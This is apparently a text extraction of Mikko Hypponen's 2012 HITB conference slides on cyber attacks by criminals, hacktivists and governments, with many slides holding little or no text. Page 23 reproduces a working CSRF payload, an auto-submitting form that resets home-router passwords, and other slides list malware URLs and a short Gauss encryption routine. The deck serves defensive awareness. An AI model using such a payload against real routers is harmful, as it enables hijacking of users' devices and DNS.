mikko hypponen - behind enemy lines.pdf

50
HitbSecConfKL 2012 Mikko Hypponen CRO F-Secure twitter.com/mikko

Upload: phamminh

Post on 03-Jan-2017

245 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Mikko Hypponen - Behind Enemy Lines.pdf

HitbSecConfKL 2012

Mikko Hypponen

CRO

F-Secure twitter.com/mikko

Page 2: Mikko Hypponen - Behind Enemy Lines.pdf

• 11 October, 2012

Page 3: Mikko Hypponen - Behind Enemy Lines.pdf
Page 4: Mikko Hypponen - Behind Enemy Lines.pdf

• 11 October, 2012

Page 5: Mikko Hypponen - Behind Enemy Lines.pdf

The Three Main Sources of Cyber Attacks

Criminals Hactivists Governments

Page 6: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

Criminals

Page 7: Mikko Hypponen - Behind Enemy Lines.pdf

Matjaz skorjanc

Page 8: Mikko Hypponen - Behind Enemy Lines.pdf
Page 9: Mikko Hypponen - Behind Enemy Lines.pdf
Page 10: Mikko Hypponen - Behind Enemy Lines.pdf
Page 11: Mikko Hypponen - Behind Enemy Lines.pdf
Page 12: Mikko Hypponen - Behind Enemy Lines.pdf
Page 13: Mikko Hypponen - Behind Enemy Lines.pdf
Page 14: Mikko Hypponen - Behind Enemy Lines.pdf
Page 15: Mikko Hypponen - Behind Enemy Lines.pdf

"Dedicated servers in data

center in Syria for ANY

projects"

"Mass domain registration

service. Buy 5 – 10 – 15

domains instantly. For

malware, traffic and the other

things"

Page 16: Mikko Hypponen - Behind Enemy Lines.pdf
Page 17: Mikko Hypponen - Behind Enemy Lines.pdf
Page 18: Mikko Hypponen - Behind Enemy Lines.pdf

map.honeynet.org

Page 19: Mikko Hypponen - Behind Enemy Lines.pdf

Sality

Sipscan

Page 20: Mikko Hypponen - Behind Enemy Lines.pdf

Zeroaccess KML

file available from

F-Secure Weblog

Page 21: Mikko Hypponen - Behind Enemy Lines.pdf
Page 22: Mikko Hypponen - Behind Enemy Lines.pdf

Case cg4ng3dn5

• 4 million home DSL routers in Braz il

• Huawei, ZyXel, D-Link, Linksys, Netgear…

• Cross Site Request Forgery (CSRF) to be performed in the administration panel of the ADSL modem

• Changing the DNS servers to malicious ones

• Some Brazilian ISPs had more than 50% of users affected

Page 23: Mikko Hypponen - Behind Enemy Lines.pdf

<body onLoad=javascript:document.form.submit()>

<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">

<input type="hidden" name="sptPassword" value="cg4ng3dn5">

<input type="hidden" name="usrPassword" value="cg4ng3dn5">

<input type="hidden" name="sysPassword" value="cg4ng3dn5">

</form>

</body>

Page 24: Mikko Hypponen - Behind Enemy Lines.pdf
Page 25: Mikko Hypponen - Behind Enemy Lines.pdf

Image from

Securelist.

Page 26: Mikko Hypponen - Behind Enemy Lines.pdf

• google.com/GoogleDefence.exe

• facebook.com/ChromeSetup.exe

• facebook.com/Activex_Components.exe

• msn.com/ChromeSetup.exe

Page 27: Mikko Hypponen - Behind Enemy Lines.pdf
Page 28: Mikko Hypponen - Behind Enemy Lines.pdf
Page 29: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

Hactivists

Page 30: Mikko Hypponen - Behind Enemy Lines.pdf
Page 31: Mikko Hypponen - Behind Enemy Lines.pdf
Page 32: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

GeoHot / George Hotz

Comex / Nicholas Allegra

Page 33: Mikko Hypponen - Behind Enemy Lines.pdf
Page 34: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

Governmental attacks

Page 35: Mikko Hypponen - Behind Enemy Lines.pdf
Page 36: Mikko Hypponen - Behind Enemy Lines.pdf
Page 37: Mikko Hypponen - Behind Enemy Lines.pdf
Page 38: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

Page 39: Mikko Hypponen - Behind Enemy Lines.pdf

Nuclear physics lost it's innocence in 1945

Page 40: Mikko Hypponen - Behind Enemy Lines.pdf

6es7-315-2 / 6es7-417

Computer science lost it's innocence in 2009

Page 41: Mikko Hypponen - Behind Enemy Lines.pdf
Page 42: Mikko Hypponen - Behind Enemy Lines.pdf
Page 43: Mikko Hypponen - Behind Enemy Lines.pdf
Page 44: Mikko Hypponen - Behind Enemy Lines.pdf
Page 45: Mikko Hypponen - Behind Enemy Lines.pdf
Page 46: Mikko Hypponen - Behind Enemy Lines.pdf
Page 47: Mikko Hypponen - Behind Enemy Lines.pdf

Gauss encryption mov ecx, (LENGTHOF tToCrypt)-1

mov edx, OFFSET tToCrypt

mov ebx, OFFSET tEncrypt

L1:

mov eax, [edx]

XOR eax, ACDCh

not eax

mov [ebx], eax

inc edx

inc EBX

LOOP L1

mov edx, OFFSET tOutEncr

call WriteString

mov edx, OFFSET tEncrypt

call WriteString

call Crlf

ret

Page 48: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

Page 49: Mikko Hypponen - Behind Enemy Lines.pdf

Protecting the irreplaceable | f-secure.com

Page 50: Mikko Hypponen - Behind Enemy Lines.pdf

HitbSecConfKL 2012

Mikko Hypponen

CRO

F-Secure twitter.com/mikko